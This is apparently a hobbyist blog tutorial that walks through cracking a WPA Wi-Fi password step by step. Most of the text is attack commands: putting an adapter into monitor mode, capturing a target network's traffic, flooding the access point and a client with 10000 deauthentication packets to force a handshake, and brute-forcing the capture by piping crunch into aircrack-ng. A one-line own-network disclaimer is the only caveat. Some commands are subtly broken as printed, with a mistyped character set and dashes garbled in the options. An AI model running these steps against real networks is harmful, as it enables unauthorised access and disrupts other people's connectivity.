Today I will show you how to crack a wireless router using aircrack-ng and crunch.
First off this is tested on my own home network as i don’t advise hacking anyone else’s WiFi but your own.
First we need to put our wireless adaptor into monitor mode. Monitor mode: or RFMON mode, allows a computer with a wireless network interface controller to monitor all traffic received from the wireless network. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with any access point or ad hoc network first.
Lets find out the name your card it will often be listed in Kali Linux as wlan0 or if using usb wifi like me you can use the ifconfig to find out.
Now that we know the name of our wireless interface we need to put our wireless card into to monitor mode with airmon-ng start wlan1.
# airmon-ng start wlan1
Now the the wireless interface wlan1 will be put in to monitor mode. We can check if our wireless interface is in monitor mode by using ifconfig.
As you see in the screen shot above we now have a wireless interface called wlan1mon this tells us that airmon-ng has successfully put out wireless card into monitor mode. Now we can use airodump-ng wlan1mon to find information about wifi signals such as BSSID and the wireless channel the target wireless network is running on.
And the output.
For this tutorial I’m using cablecomm-camget4. Once we have found a target wireless network we need to copy the bssid of the network. Open a new terminal and type airodump-ng –bssid the bssid of the network -c the channel of the network mines channel 1 –write the essid of the network CableComm-CamGet4. Essid is the target networks wireless interface name. Your command should look like this airodump-ng –bssid 00:23:BE:47:3C:93 -c1 –write CableComm-CamGet4 wlan1mon.
# airodump-ng –bssid 00:23:BE:47:3C:93 -c1 –write CableComm-CamGet4 wlan1mon
Now its time to get the handshake this is the fun part. I’m going to show you two different ways to do this.
Frist one is.
aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon for the main network
# aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon
Second one is.
aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon or use the -c for the client of the network
# aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon
Or you can do what i do and run the two attacks a alongside each other.
Now we need to wait for the handshake from the client.
Now here comes the fun part mostly for those with small hard-drives that don’t have the space for word-lists. We can use the following command if we don’t have any word-lists.
# crunch 4 20 abcdefghijklmnopqustuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng CableComm-CamGet4-02.cap -e CableComm-CamGet4 -w-
Piping crunch with aircrack can save you time using word-lists.
Now its time to open the cap file to crack the password. Let aircrack run and there ya go .. crunch can be piped with a number of tools like hashcat , john most the bruteforce tools on kali , parrot .
Have fun lads and happy hacking.